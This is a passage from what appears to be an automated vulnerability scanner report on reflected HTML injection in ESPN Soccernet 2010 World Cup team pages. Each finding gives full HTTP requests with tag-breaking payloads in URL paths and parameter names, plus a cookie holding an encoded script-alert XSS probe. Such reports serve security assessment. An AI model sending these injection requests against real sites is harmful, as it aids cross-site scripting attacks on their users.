HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:07:48 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:07:48 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN20 Cache-Expires: Sat, 06 Nov 2010 23:12:48 GMT Content-Length: 80382 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>England Football / ...[SNIP]... <a href="/worldcup2010/team?team=448&d6170"><a>7607dfaf4a2=1&_slug_=england&d6170"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a26e"><a>ecad0508930 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/449/netherlands7a26e"><a>ecad0508930 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:24:22 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:24:22 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN21 Cache-Expires: Sat, 06 Nov 2010 23:29:22 GMT Content-Length: 81781 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Netherlands Footbal ...[SNIP]... <a href="/worldcup2010/team?team=449&_slug_=netherlands7a26e"><a>ecad0508930&topId=808125&linktext=Andres+Iniesta+fires+Spain+to+glory"> ...[SNIP]...
5.79. http://soccernet.espn.go.com/worldcup2010/team/_/team/449/netherlands [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/449/netherlands
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload accaf"><a>fe1ec450d74 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/449/netherlands?accaf"><a>fe1ec450d74=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:20:01 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:20:01 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN02 Cache-Expires: Sat, 06 Nov 2010 23:25:01 GMT Content-Length: 81889 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Netherlands Footbal ...[SNIP]... <a href="/worldcup2010/team?team=449&accaf"><a>fe1ec450d74=1&_slug_=netherlands&accaf"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1e3a"><a>0e9f0d0eed8 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/451/south-koreab1e3a"><a>0e9f0d0eed8 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:29:10 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:29:10 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN33 Cache-Expires: Sat, 06 Nov 2010 23:34:10 GMT Content-Length: 81932 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>South Korea Footbal ...[SNIP]... <a href="/worldcup2010/team?team=451&_slug_=south-koreab1e3a"><a>0e9f0d0eed8&topId=792536&linktext=Huh+decides+not+to+renew+contract"> ...[SNIP]...
5.81. http://soccernet.espn.go.com/worldcup2010/team/_/team/451/south-korea [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/451/south-korea
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28a78"><a>ad6c5189518 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/451/south-korea?28a78"><a>ad6c5189518=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:27:28 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:27:28 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN03 Cache-Expires: Sat, 06 Nov 2010 23:32:28 GMT Content-Length: 82040 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>South Korea Footbal ...[SNIP]... <a href="/worldcup2010/team?team=451&28a78"><a>ad6c5189518=1&_slug_=south-korea&28a78"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5bf60"><a>27f1ff77858 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/455/greece5bf60"><a>27f1ff77858 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:10:41 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:10:41 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN13 Cache-Expires: Sat, 06 Nov 2010 23:15:41 GMT Content-Length: 82126 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Greece Football / S ...[SNIP]... <a href="/worldcup2010/team?team=455&_slug_=greece5bf60"><a>27f1ff77858&topId=766098&linktext=Rehhagel+steps+down+as+Greece+coach"> ...[SNIP]...
5.83. http://soccernet.espn.go.com/worldcup2010/team/_/team/455/greece [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/455/greece
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9866"><a>90f66760c97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/455/greece?a9866"><a>90f66760c97=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:08:55 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:08:55 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN11 Cache-Expires: Sat, 06 Nov 2010 23:13:54 GMT Content-Length: 82234 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Greece Football / S ...[SNIP]... <a href="/worldcup2010/team?team=455&a9866"><a>90f66760c97=1&_slug_=greece&a9866"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f1e2"><a>30af7f0b19c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/467/south-africa6f1e2"><a>30af7f0b19c HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:28:58 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:28:58 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN17 Cache-Expires: Sat, 06 Nov 2010 23:33:58 GMT Content-Length: 82316 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>South Africa Footba ...[SNIP]... <a href="/worldcup2010/team?team=467&_slug_=south-africa6f1e2"><a>30af7f0b19c&topId=792945&linktext=South+African+president+praises+side"> ...[SNIP]...
5.85. http://soccernet.espn.go.com/worldcup2010/team/_/team/467/south-africa [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/467/south-africa
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c1ec"><a>0e9b1b1a4b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/467/south-africa?4c1ec"><a>0e9b1b1a4b5=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; 